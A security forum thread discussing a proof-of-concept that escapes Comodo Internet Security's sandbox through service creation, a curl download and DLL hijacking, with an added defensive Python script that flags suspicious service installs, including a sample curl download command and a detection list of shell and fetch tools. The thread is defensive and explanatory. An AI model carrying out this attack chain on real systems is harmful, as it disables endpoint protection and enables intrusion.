Serious Discussion Comodo Internet Security 2025 was obliterated by an exploit!

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,472
I finished the third version of the POC and now it does not require any additional files ;)

detection shellcode injection is enabled, untrusted restricted mode, and embedded code detection on

If I understood correctly, you bypassed the sandbox protection related to dropping files outside the sandbox. However, it does not follow from your post that those files can be executed outside the sandbox by the POC, or that the POC can modify files outside the sandbox. Can the POC do such actions? I have in mind the first phase of the attack, before downloading tdsskiller.

Edit.
The POC should be blocked in @cruelsister's settings because the contained executable could not call home.
 

Loyisa

Level 1
Aug 8, 2024
17
If I understood correctly, you bypassed the sandbox protection related to dropping files outside the sandbox. However, it does not follow from your post that those files can be executed outside the sandbox by the POC, or that the POC can modify files outside the sandbox. Can the POC do such actions? I have in mind the first phase of the attack, before downloading tdsskiller.

Edit.
The POC should be blocked in @cruelsister's settings because the contained executable could not call home.
Yes, the POC uses a special way to create a service which Comodo can't handle properly; Comodo will then think that svchost.exe is executing those commands/files, not the POC itself.
 

Andy Ful

Treat the symptom, not the disease.
I can still release the payload in other directories:(

Only that particular sample is blocked in @cruelsister's settings. It is possible to embed the payloads in the POC and drop/execute them without downloading anything. (y)

Yes, the POC uses a special way to create a service which Comodo can't handle properly; Comodo will then think that svchost.exe is executing those commands/files, not the POC itself.

It would be interesting to check if the payload dropped to the sandbox, copied by your exploit outside the sandbox and executed via Svchost, can still be contained in the sandbox. :unsure:
 

Loyisa

Only that particular sample is blocked in @cruelsister's settings. It is possible to embed the payloads in the POC and drop/execute them without downloading anything. (y)

It would be interesting to check if the payload dropped to the sandbox, copied by your exploit outside the sandbox and executed via Svchost, can still be contained in the sandbox. :unsure:
The execution flow is as follows:
Run POC -> POC can create services outside containment through magic -> Use the service (to run curl.exe) to download the payloads ->
-> Use the service to run a file trusted by Comodo and do DLL hijacking (the bad DLL released escaped.txt) -> Run tdsskiller -> Comodo dead

Andy Ful

The execution flow is as follows:
Run POC -> POC can create services outside containment through magic -> Use the service (curl.exe) to download the payloads ->
-> Use the service to run a file trusted by Comodo and do DLL hijacking (the bad DLL released escaped.txt) -> Run tdsskiller -> Comodo dead

So, the trusted executable executed by the service outside the sandbox can load the malicious DLL, and that DLL will not be sandboxed?
 

Loyisa

So, the trusted executable executed by the service outside the sandbox can load the malicious DLL, and that DLL will not be sandboxed?
Yes, Comodo doesn't seem to be very good at handling DLL hijacking, and a DLL is basically not sandboxable; basically, trusted file + bad DLL = Comodo blinded.
If you use Safe mode in HIPS/firewall to face DLL hijacking, it basically means that your computer is not safe.
(During this process, Comodo did not monitor the creation of services; svchost.exe and curl.exe were both trusted files, so there were no firewall alerts.)
 
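The post above makes a point a defender can act on: the service creation itself went unmonitored, while the binaries the service launched (svchost.exe, curl.exe) were trusted. Windows records every service installation in the System log as Event ID 7045 from the "Service Control Manager" source, independently of any third-party product, so that record is a natural place to look. The script below is an added example written for this thread; it is not code from the thread, from Comodo, or from the POC's author. The event bodies it parses are constructed to match the 7045 message layout, the directory allow-list and the tool list are the author's assumptions, and curl.exe is on the list only because the thread names it.

```python
"""Triage Windows service-install records (System log, Event ID 7045).

Added example; not from the thread, Comodo, or the POC. SAMPLE_EVENTS are
constructed to mirror the 7045 message body rendered by Event Viewer.
"""

# Directories from which a freshly installed service image is unremarkable
# (assumed allow-list; tune to the estate being monitored).
TRUSTED_ROOTS = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Programs that rarely belong as the image of a new service: curl.exe is the
# downloader named in the thread; the two shells are a generic heuristic.
SHELL_OR_FETCH_TOOLS = {"curl.exe", "cmd.exe", "powershell.exe"}

# Constructed 7045 message bodies (field labels exactly as Windows renders them).
SAMPLE_EVENTS = [
    r"""A service was installed in the system.

Service Name:  NetProfSvc
Service File Name:  %SystemRoot%\System32\svchost.exe -k netsvcs -p
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem""",
    r"""A service was installed in the system.

Service Name:  ExampleUpdater
Service File Name:  "C:\Program Files\Example\updater.exe" /svc
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem""",
    r"""A service was installed in the system.

Service Name:  UpdateHelperSvc
Service File Name:  C:\Windows\System32\curl.exe -o C:\Users\Public\p.dat https://example.invalid/p
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem""",
    r"""A service was installed in the system.

Service Name:  SysMaint
Service File Name:  C:\Users\Public\svc_loader.exe
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem""",
]


def parse_7045(message):
    """Return the 'Label: value' pairs of a 7045 message body, labels lower-cased.

    Splitting on the first colon is safe: labels contain no colon, while the
    drive letter colon in 'C:\\...' sits inside the value.
    """
    fields = {}
    for line in message.splitlines():
        if ":" in line:
            label, _, value = line.partition(":")
            fields[label.strip().lower()] = value.strip()
    return fields


def executable_from_command(command):
    """Extract the program path from a service command line.

    Handles a quoted path ("C:\\Program Files\\x\\y.exe" /arg) and a bare path
    (C:\\Windows\\System32\\curl.exe -o ...). A bare path containing spaces is
    truncated at the first space; that is a known limit of the heuristic.
    """
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end != -1 else command[1:]
    return command.split(" ", 1)[0]


def normalize_path(path):
    """Lower-case the path and expand the two environment variables SCM
    commonly records (%SystemRoot%, %windir%) so allow-list prefixes match."""
    p = path.lower()
    for var in ("%systemroot%", "%windir%"):
        p = p.replace(var, "c:\\windows")
    return p


def assess_service_install(message):
    """Apply the two heuristics to one 7045 record; 'reasons' is empty if clean."""
    fields = parse_7045(message)
    image = normalize_path(executable_from_command(fields.get("service file name", "")))
    basename = image.rsplit("\\", 1)[-1]
    reasons = []
    if not image.startswith(TRUSTED_ROOTS):
        reasons.append("image outside Windows/Program Files directories")
    if basename in SHELL_OR_FETCH_TOOLS:
        reasons.append(f"service runs {basename} directly")
    return {"name": fields.get("service name", "?"), "image": image, "reasons": reasons}


def flagged_services(messages):
    """Return the assessments that carry at least one reason."""
    return [r for r in map(assess_service_install, messages) if r["reasons"]]


if __name__ == "__main__":
    for hit in flagged_services(SAMPLE_EVENTS):
        print(f"{hit['name']}: {hit['image']} -> {'; '.join(hit['reasons'])}")
```

The svchost.exe record passes both checks on purpose: a service hosted in svchost carries its real code in the ServiceDll registry value, which 7045 does not show, so a svchost-based install has to be cross-checked against that value separately. The script is a triage filter over exported records, not a replacement for that step.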

Andy Ful

Yes, Comodo doesn't seem to be very good at handling DLL hijacking, and a DLL is basically not sandboxable; basically, trusted file + bad DLL = Comodo blinded.

So, the attack can also be done fully outside the sandbox, except if in DLL hijacking the execution of a trusted file has to be done via the custom service.
 


Andy Ful

I think that there is an option in Comodo that prevents the automatic authorization of untrusted executables executed by trusted ones. This option could probably block DLL hijacking. But it can significantly increase false positives.
 

rashmi

Level 11
Jan 15, 2024
538
For those interested, there is additional information about this topic on the Comodo forums.
A moderator's response:
"I only took a quick look at the source code and I can tell what the issue is. By default CIS does not protect access to the service control manager defined as *\RPC Control\ntsvcs, so you would need to add that path to the protected COM interfaces section. The source code also contains code that attempts to access the SCM via a named pipe, so you can also add *\Device\NamedPipe\ntsvcs to the protected files section to cover the named pipe access.

With that said, there is a compatibility issue with Windows UAC that prevents containment restriction levels being set to the desired restriction level for applications that require administrator rights. This means if you set the containment rule to use a restriction level higher than partially limited, e.g. limited, restricted, or untrusted, and you run an application that requests admin rights/elevation, then CIS will lower the restriction level to partially limited. So you don't get the protection provided by the higher restriction levels.

Therefore you need to completely disable UAC by setting the EnableLUA registry value to 0. This is important to note, as using SCM requires admin rights, and setting UAC to never notify doesn't actually disable UAC itself, as it just won't pop up a UAC alert and will auto-grant elevation to admin.

Edit: oh, and there is yet another bug that affects CIS on Windows 11 with regards to using restriction levels. Whenever an application is executed by Windows Explorer, which happens when you use your mouse to run apps, the restrictions that are supposed to be applied don't get set, so you get tricked into a false sense of security."
 

Andy Ful

For those interested, there is additional information about this topic on the Comodo forums.
A moderator's response:
...
With that said, there is a compatibility issue with Windows UAC that prevents containment restriction levels being set to the desired restriction level for applications that require administrator rights. This means if you set the containment rule to use a restriction level higher than partially limited, e.g. limited, restricted, or untrusted, and you run an application that requests admin rights/elevation, then CIS will lower the restriction level to partially limited. So you don't get the protection provided by the higher restriction levels. ..."

So, using a Standard User Account can be valuable for real containment. :)
However, this will not solve the DLL hijacking issue and malware that can encrypt/steal data with standard privileges.
 
